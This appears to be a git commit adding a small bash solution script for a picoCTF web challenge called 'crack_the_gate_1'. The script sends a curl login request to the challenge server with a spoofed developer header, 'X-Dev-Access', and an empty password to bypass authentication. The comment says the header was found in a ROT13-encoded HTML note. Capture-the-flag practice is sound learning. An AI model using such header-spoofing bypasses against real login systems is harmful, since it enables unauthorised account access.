web/crack_the_gate_1

This commit is contained in:
2026-07-03 14:42:01 +09:00
parent 08f38a05ac
commit 8e8936404c
+9
View File
@@ -0,0 +1,9 @@
#!/usr/bin/env bash
# ROT13 encoded note in html: NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes"
curl \
-X POST \
-H "X-Dev-Access: yes" \
--json '{"email":"ctf-player@picoctf.org","password":""}' \
"http://amiable-citadel.picoctf.net:51025/login"